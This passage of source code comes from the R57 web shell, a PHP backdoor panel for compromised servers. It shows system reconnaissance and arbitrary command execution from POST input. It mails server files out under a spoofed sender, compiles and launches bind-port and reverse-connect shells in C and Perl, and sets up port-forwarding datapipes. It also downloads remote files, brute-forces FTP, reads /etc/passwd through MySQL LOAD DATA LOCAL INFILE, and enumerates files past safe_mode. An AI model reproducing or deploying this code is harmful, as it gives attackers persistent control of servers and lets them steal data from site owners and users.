  3397. echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<DIV dir=ltr align=center><font face=Webdings size=10><b>@</b></font><b>'.ws(2).'<DIV dir=ltr align=center><SPAN
  3398. style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px">
  3399. <SPAN
  3400. style="FONT-SIZE: 20pt; COLOR: red; FONT-FAMILY: Impact">R57 ver 1.5</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
  3401. echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
  3402. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."? title=\"".$lang[$language.'_text46']."\"><b>The main survey</b></a> ".$rb;
  3403. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?sqlman title=\"".$lang[$language.'_text46']."\"><b>SQL</b></a> ".$rb;
  3404. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
  3405. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
  3406. if($unix)
  3407.  {
  3408.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
  3409.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
  3410.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
  3411.  }
  3412. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
  3413. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
  3414. echo ws(2)."safe_mode: <b>";
  3415. echo (($safe_mode)?("<font color=#008000>ON</font>"):("<font color=red>OFF</font>"));
  3416. echo "</b>".ws(2);
  3417. echo "PHP version: <b>".@phpversion()."</b>";
  3418. $curl_on = @function_exists('curl_version');
  3419. echo ws(2);
  3420. echo "cURL: <b>".(($curl_on)?("<font color=#008000>ON</font>"):("<font color=red>OFF</font>"));
  3421. echo "</b>".ws(2);
  3422. echo "MYSQL: <b>";
  3423. $mysql_on = @function_exists('mysql_connect');
  3424. if($mysql_on){
  3425. echo "<font color=#008000>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
  3426. echo "</b>".ws(2);
  3427. echo "MSSQL: <b>";
  3428. $mssql_on = @function_exists('mssql_connect');
  3429. if($mssql_on){echo "<font color=#008000>ON</font>";}else{echo "<font color=red>OFF</font>";}
  3430. echo "</b>".ws(2);
  3431. echo "PostgreSQL: <b>";
  3432. $pg_on = @function_exists('pg_connect');
  3433. if($pg_on){echo "<font color=#008000>ON</font>";}else{echo "<font color=red>OFF</font>";}
  3434. echo "</b>".ws(2);
  3435. echo "Oracle: <b>";
  3436. $ora_on = @function_exists('ocilogon');
  3437. if($ora_on){echo "<font color=#008000>ON</font>";}else{echo "<font color=red>OFF</font>";}
  3438. echo "</b><br>".ws(2);
  3439. echo "Disable functions: <b>";
  3440. if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
  3441. $free = @diskfreespace($dir);
  3442. if (!$free) {$free = 0;}
  3443. $all = @disk_total_space($dir);
  3444. if (!$all) {$all = 0;}
  3445. echo "<br>".ws(2)."HDD Free  : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
  3446. echo "</b><br>".ws(2);
  3447. echo "Register globals: <b>";
  3448. $reg_g = @ini_get("register_globals");
  3449. if($reg_g){
  3450. echo "<font color=#008000>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
  3451. echo "</b>".ws(2);
  3452. echo "open_basedir: <b>";
  3453. $openbasedi = @ini_get("open_basedir");
  3454. if($openbasedi){
  3455. echo "<font color=red>ON</font>"; } else { echo "<font color=#008000>OFF</font>"; }
  3456. echo "</b>".ws(2);
  3457. echo '</font></td></tr><table>
  3458. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc>
  3459. <tr><td align=right width=100>';
  3460. echo $font;
  3461. if($unix){
  3462. echo '<font color=#990000><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
  3463. echo "</td><td>";
  3464. echo "<font face=tahoma size=-2 color=#cccccc><b>";
  3465. echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
  3466. echo ws(3).$sysctl."<br>";
  3467. echo ws(3).ex('echo $OSTYPE')."<br>";
  3468. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
  3469. if(!empty($id)) { echo ws(3).$id."<br>"; }
  3470. else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
  3471.  {
  3472.  $euserinfo  = @posix_getpwuid(@posix_geteuid());
  3473.  $egroupinfo = @posix_getgrgid(@posix_getegid());
  3474.  echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
  3475.  }
  3476. else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
  3477. echo ws(3).$dir;
  3478. echo ws(3).'( '.perms(@fileperms($dir)).' )';
  3479. echo "<br>";
  3480. echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
  3481. echo "</b></font>";
  3482. }
  3483. else
  3484. {
  3485. echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
  3486. echo "</td><td>";
  3487. echo "<font face=tahoma size=-2 color=red><b>";
  3488. echo ws(3).@substr(@php_uname(),0,120)."<br>";
  3489. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
  3490. echo ws(3).@getenv("USERNAME")."<br>";
  3491. echo ws(3).$dir;
  3492. echo "<br>";
  3493. echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
  3494. echo "<br></font>";
  3495. }
  3496. echo "</font>";
  3497. echo "</td></tr></table>";
  3498. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
  3499.  {
  3500.  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
  3501.  err(6+$res);
  3502.  $_POST['cmd']="";
  3503.  }
  3504. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
  3505.  {
  3506.  if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
  3507.  else
  3508.   {
  3509.     $filename = @basename($_POST['loc_file']);
  3510.     $filedump = @fread($file,@filesize($_POST['loc_file']));
  3511.     fclose($file);
  3512.     $content_encoding=$mime_type='';
  3513.     compress($filename,$filedump,$_POST['compress']);
  3514.     $attach = array(
  3515.                     "name"=>$filename,
  3516.                     "type"=>$mime_type,
  3517.                     "content"=>$filedump
  3518.                    );
  3519.     if(empty($_POST['subj'])) { $_POST['subj'] = 'file from ly0kha shell'; }
  3520.     if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
  3521.     $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
  3522.     err(6+$res);
  3523.     $_POST['cmd']="";
  3524.   }
  3525.  }
  3526. if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
  3527. {
  3528. $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
  3529. }
  3530. if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
  3531.  {
  3532.  switch($_POST['what'])
  3533.    {
  3534.    case 'own':
  3535.    @chown($_POST['param1'],$_POST['param2']);
  3536.    break;
  3537.    case 'grp':
  3538.    @chgrp($_POST['param1'],$_POST['param2']);
  3539.    break;
  3540.    case 'mod':
  3541.    @chmod($_POST['param1'],intval($_POST['param2'], 8));
  3542.    break;
  3543.    }
  3544.  $_POST['cmd']="";
  3545.  }
  3546. if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
  3547.  {
  3548.    switch($_POST['what'])
  3549.    {
  3550.      case 'file':
  3551.       if($_POST['action'] == "create")
  3552.        {
  3553.        if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
  3554.        else {
  3555.         fclose($file);
  3556.         $_POST['e_name'] = $_POST['mk_name'];
  3557.         $_POST['cmd']="edit_file";
  3558.         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
  3559.         }
  3560.        }
  3561.        else if($_POST['action'] == "delete")
  3562.        {
  3563.        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
  3564.        $_POST['cmd']="";
  3565.        }
  3566.      break;
  3567.      case 'dir':
  3568.       if($_POST['action'] == "create"){
  3569.       if(mkdir($_POST['mk_name']))
  3570.        {
  3571.          $_POST['cmd']="";
  3572.          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
  3573.        }
  3574.       else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
  3575.       }
  3576.       else if($_POST['action'] == "delete"){
  3577.       if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
  3578.       $_POST['cmd']="";
  3579.       }
  3580.      break;
  3581.    }
  3582.  }
  3583. if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
  3584.  {
  3585.  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
  3586.  if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
  3587.  else {
  3588.  echo $table_up3;
  3589.  echo $font;
  3590.  echo "<form name=save_file method=post>";
  3591.  echo ws(3)."<b>".$_POST['e_name']."</b>";
  3592.  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
  3593.  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
  3594.  fclose($file);
  3595.  echo "</textarea>";
  3596.  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
  3597.  echo "<input type=hidden name=dir value=".$dir.">";
  3598.  echo "<input type=hidden name=cmd value=save_file>";
  3599.  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
  3600.  echo "</div>";
  3601.  echo "</font>";
  3602.  echo "</form>";
  3603.  echo "</td></tr></table>";
  3604.  exit();
  3605.  }
  3606.  }
  3607. if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
  3608.  {
  3609.  $mtime = @filemtime($_POST['e_name']);
  3610.  if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
  3611.  else {
  3612.  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
  3613.  @fwrite($file,$_POST['e_text']);
  3614.  @touch($_POST['e_name'],$mtime,$mtime);
  3615.  $_POST['cmd']="";
  3616.  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
  3617.  }
  3618.  }
  3619.  
  3620.  
  3621.  
  3622. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
  3623. {
  3624.  cf("/tmp/bd.c",$port_bind_bd_c);
  3625.  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
  3626.  @unlink("/tmp/bd.c");
  3627.  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
  3628.  $_POST['cmd']="ps -aux | grep bd";
  3629. $_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
  3630.  
  3631. }
  3632. if (!empty($_POST['port1']))
  3633. {
  3634.  cf("bds",$port_bind_bd_cs);
  3635.  $blah = ex("chmod 777 bds");
  3636.  $blah = ex("./bds ".$_POST['port1']." &");
  3637.  $_POST['cmd']="echo \"Now script install backdoor connect to port ";
  3638.   }else{
  3639. cf("/tmp/bds",$port_bind_bd_cs);
  3640.  $blah = ex("chmod 777 bds");
  3641.  $blah = ex("./tmp/bds ".$_POST['port1']." &");
  3642.  }
  3643. if (!empty($_POST['php_ini1']))
  3644. {
  3645.  cf("php.ini",$php_ini1);
  3646.   $_POST['cmd']=" ?????? ????? ??? php.ini ?? ??? ???";
  3647.  }
  3648.  
  3649.  if (!empty($_POST['htacces']))
  3650. {
  3651.  cf(".htaccess",$htacces);
  3652.   $_POST['cmd']="To stop manufacturing Skjorti htaccess Been laying file";
  3653.  }
  3654.   if (!empty($_POST['file_ini']))
  3655. {
  3656.  cf("ini.php",$sni_res);
  3657.  
  3658.   $_POST['cmd']=" http://target.com/ini.php?ss=http://shell.txt?Read ss variable ini.php Error! Can't write in file";
  3659.  }
  3660.  
  3661. if(($_POST['fileto'] != "")||($_POST['filefrom'] != ""))
  3662.  
  3663. {
  3664. $data = implode("", file($_POST['filefrom']));
  3665. $fp = fopen($_POST['fileto'], "wb");
  3666. fputs($fp, $data);
  3667. $ok = fclose($fp);
  3668. if($ok)
  3669. {
  3670. $size = filesize($_POST['fileto'])/1024;
  3671. $sizef = sprintf("%.2f", $size);
  3672. print "<center><div id=logostrip>Download - OK.
  3673. (".$sizef."ê?)</div></center>";
  3674. }
  3675. else
  3676. {
  3677. print "<center><div id=logostrip>Something is wrong. Download - IS NOT
  3678. OK</div></center>";
  3679. }
  3680. }
  3681. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
  3682. {
  3683.  cf("/tmp/bdpl",$port_bind_bd_pl);
  3684.  $p2=which("perl");
  3685.  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
  3686.  $_POST['cmd']="ps -aux | grep bdpl";
  3687.  $_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
  3688. }
  3689. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
  3690. {
  3691.  cf("/tmp/back",$back_connect);
  3692.  $p2=which("perl");
  3693.  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
  3694.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...Datached\"";
  3695. }
  3696. if (!empty($_POST['ips']) && !empty($_POST['ports']))
  3697. {
  3698.  cf("/tmp/backs",$back_connects);
  3699.  $p2=which("perl");
  3700.  $blah = ex($p2." /tmp/backs ".$_POST['ips']." ".$_POST['ports']." &");
  3701.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ips']." port ".$_POST['ports']." ...\"";
  3702.  
  3703. }
  3704. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
  3705. {
  3706.  cf("/tmp/back.c",$back_connect_c);
  3707.  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
  3708.  @unlink("/tmp/back.c");
  3709.  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
  3710.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
  3711. }
  3712. if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
  3713. {
  3714.  cf("/tmp/dp",$datapipe_pl);
  3715.  $p2=which("perl");
  3716.  $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
  3717.  $_POST['cmd']="ps -aux | grep dp";
  3718. }
  3719. if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
  3720. {
  3721.  cf("/tmp/dpc.c",$datapipe_c);
  3722.  $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
  3723.  @unlink("/tmp/dpc.c");
  3724.  $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
  3725.  $_POST['cmd']="ps -aux | grep dpc";
  3726. }
  3727. if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
  3728. if (!empty($HTTP_POST_FILES['userfile']['name']))
  3729. {
  3730. if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
  3731. else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
  3732. @copy($HTTP_POST_FILES['userfile']['tmp_name'],
  3733.             $_POST['dir']."/".$nfn)
  3734.       or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
  3735. }
  3736. if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
  3737. {
  3738.  switch($_POST['with'])
  3739.  {
  3740.  case wget:
  3741.  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
  3742.  break;
  3743.  case fetch:
  3744.  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
  3745.  break;
  3746.  case lynx:
  3747.  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  3748.  break;
  3749.  case links:
  3750.  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  3751.  break;
  3752.  case GET:
  3753.  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  3754.  break;
  3755.  case curl:
  3756.  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
  3757.  break;
  3758.  }
  3759. }
  3760. if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
  3761.  {
  3762.  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  3763.  if(empty($ftp_port)) { $ftp_port = 21; }
  3764.  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  3765.  if(!$connection) { err(3); }
  3766.  else
  3767.   {
  3768.   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
  3769.   else
  3770.    {
  3771.    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
  3772.    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
  3773.    }
  3774.   }
  3775.  @ftp_close($connection);
  3776.  $_POST['cmd'] = "";
  3777.  }
  3778.  
  3779. if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
  3780.  {
  3781.  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  3782.  if(empty($ftp_port)) { $ftp_port = 21; }
  3783.  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  3784.  if(!$connection) { err(3); $_POST['cmd'] = ""; }
  3785.  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
  3786.  @ftp_close($connection);
  3787.  }
  3788. echo $table_up3;
  3789.  
  3790. if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
  3791. else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
  3792. echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
  3793.  
  3794.  
  3795.  
  3796.  
  3797. if ($method=="file") {
  3798.                         if (@file($file)) {
  3799.                                 $filer = file($file);
  3800.  
  3801.                                 foreach ($filer as $a) { echo $a; }
  3802.  
  3803.                         } else {
  3804.                                 echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
  3805.                         }
  3806.                 }
  3807.                 if ($method=="fread") {
  3808.                         if (@fopen($file, 'r')) {
  3809.                                 $fp = fopen($file, 'r');
  3810.                                 $string = fread($fp, filesize($file));
  3811.                                 echo "<pre>";
  3812.                                 echo $string;
  3813.                                 echo "</pre>";
  3814.                         } else {
  3815.                                 echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
  3816.                         }
  3817.                 }
  3818.                 if ($method=="show_source") {
  3819.                         if (show_source($file)) {
  3820.                                 echo "<pre>";
  3821.                                 echo show_source($file);
  3822.                                 echo "</pre>";
  3823.                         } else {
  3824.                                 echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
  3825.                         }
  3826.  
  3827.                 }
  3828.                 if ($method=="readfile") {
  3829.                         echo "<pre>";
  3830.                         if (readfile($file)) {
  3831.                                 //echo "<pre>";
  3832.                                 //echo readfile($file);
  3833.                                 echo "</pre>";
  3834.                         } else {
  3835.                                 echo "</pre>";
  3836.                                 echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
  3837.                         }
  3838.  
  3839.                 }
  3840.  
  3841. function dozip1($link,$file)
  3842. {
  3843.    $fp = @fopen($link,"r");
  3844.    while(!feof($fp))
  3845.    {
  3846.        $cont.= fread($fp,1024);
  3847.    }
  3848.    fclose($fp);
  3849.  
  3850.    $fp2 = @fopen($file,"w");
  3851.    fwrite($fp2,$cont);
  3852.    fclose($fp2);
  3853. }
  3854. if (isset($_POST['funzip']))
  3855. {
  3856. dozip1($_POST['funzip'],$_POST['fzip']);
  3857. }
  3858. if(empty($_POST['root'])){
  3859. } else {
  3860.    $root = $_POST['root']; }
  3861.  
  3862.  
  3863.  
  3864.  
  3865.   $c = 0; $D = array();
  3866.   set_error_handler("eh");
  3867.  
  3868.   $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
  3869.  
  3870.   for($i=0; $i < strlen($chars); $i++){
  3871.   $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
  3872.  
  3873.   $prevD = $D[count($D)-1];
  3874.   glob($path."*");
  3875.  
  3876.         if($D[count($D)-1] != $prevD){
  3877.  
  3878.         for($j=0; $j < strlen($chars); $j++){
  3879.  
  3880.            $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
  3881.  
  3882.            $prevD2 = $D[count($D)-1];
  3883.            glob($path."*");
  3884.  
  3885.               if($D[count($D)-1] != $prevD2){
  3886.  
  3887.  
  3888.                  for($p=0; $p < strlen($chars); $p++){
  3889.  
  3890.                  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
  3891.  
  3892.                  $prevD3 = $D[count($D)-1];
  3893.                  glob($path."*");
  3894.  
  3895.                     if($D[count($D)-1] != $prevD3){
  3896.  
  3897.  
  3898.                        for($r=0; $r < strlen($chars); $r++){
  3899.  
  3900.                        $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
  3901.                        glob($path."*");
  3902.  
  3903.                        }
  3904.  
  3905.                     }
  3906.  
  3907.                  }
  3908.  
  3909.               }
  3910.  
  3911.         }
  3912.  
  3913.         }
  3914.  
  3915.   }
  3916.  
  3917.   $D = array_unique($D);
  3918.  
  3919.  
  3920.  
  3921.  
  3922.   foreach($D as $item)
  3923.   if(isset($_REQUEST['root']))
  3924.   echo "{$item}\n";
  3925.  
  3926.  
  3927.  
  3928.  
  3929.   function eh($errno, $errstr, $errfile, $errline){
  3930.  
  3931.      global $D, $c, $i;
  3932.      preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
  3933.      if($o){ $D[$c] = $o[2]; $c++;}
  3934.  
  3935.   }
  3936.  
  3937.  
  3938.  
  3939.  
  3940.  
  3941. if($safe_mode)
  3942. {
  3943.  switch($_POST['cmd'])
  3944.  {
  3945.  case 'safe_dir':
  3946.   $d=@dir($dir);
  3947.   if ($d)
  3948.    {
  3949.    while (false!==($file=$d->read()))
  3950.     {
  3951.      if ($file=="." || $file=="..") continue;
  3952.      @clearstatcache();
  3953.      list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
  3954.      if(!$unix){
  3955.      echo date("d.m.Y H:i",$mtime);
  3956.      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
  3957.      }
  3958.      else{
  3959.      $owner = @posix_getpwuid($uid);
  3960.      $grgid = @posix_getgrgid($gid);
  3961.      echo $inode." ";
  3962.      echo perms(@fileperms($file));
  3963.      printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
  3964.      echo date("d.m.Y H:i ",$mtime);
  3965.      }
  3966.      echo "$file\n";
  3967.     }
  3968.    $d->close();
  3969.    }
  3970.   else echo $lang[$language._text29];
  3971.  break;
  3972.     }
  3973. }
  3974. else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
  3975.  $cmd_rep = ex($_POST['cmd']);
  3976.  if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
  3977.  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
  3978.  if($_POST['cmd'])
  3979. {
  3980.  switch($_POST['cmd'])
  3981.  {
  3982.   case 'test1':
  3983.   $ci = @curl_init("file://".$_POST['test1_file']."");
  3984.   $cf = @curl_exec($ci);
  3985.   echo $cf;
  3986.   break;
  3987.   case 'test2':
  3988.   @include($_POST['test2_file']);
  3989.   break;
  3990.   case 'mysqlb':
  3991.  
  3992. $mhost = "localhost";
  3993. $muser = $_POST['test3_ml'];
  3994. $mpass = $_POST['test3_mp'];
  3995. $mdb   = $_POST['test3_md'];
  3996. $file = $_POST['test3_file'];
  3997.  
  3998. // default mysql_read files [seperated by: ':']:
  3999. $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
  4000. $mysql_files = explode(':', $mysql_files_str);
  4001.  
  4002.  
  4003.                                                                 $sql = array (
  4004.                                                                    "USE $mdb",
  4005.  
  4006.                                                                    'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
  4007.  
  4008.                                                                    "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
  4009.                                                                    . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
  4010.                                                                    . "ESCAPED BY          '' "
  4011.                                                                    . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
  4012.  
  4013.                                                                    "SELECT a FROM $tbl LIMIT 1"
  4014.                                                                 );
  4015.  
  4016.  
  4017.                                                                 mysql_connect ($mhost, $muser, $mpass);
  4018.  
  4019.                                                                 foreach ($sql as $statement) {
  4020.                                                                    $q = mysql_query ($statement);
  4021.  
  4022.                                                                    if ($q == false) die (
  4023.                                                                       "FAILED: " . $statement . "\n" .
  4024.                                                                       "REASON: " . mysql_error () . "\n"
  4025.                                                                    );
  4026.  
  4027.                                                                    if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
  4028.  
  4029.                                                                    echo htmlspecialchars($r[0]);
  4030.                                                                    mysql_free_result ($q);
  4031.                                                                 }
  4032.  
  4033.  
  4034. echo "</textarea>";
  4035.  
  4036.  break;
  4037.   case 'test4':
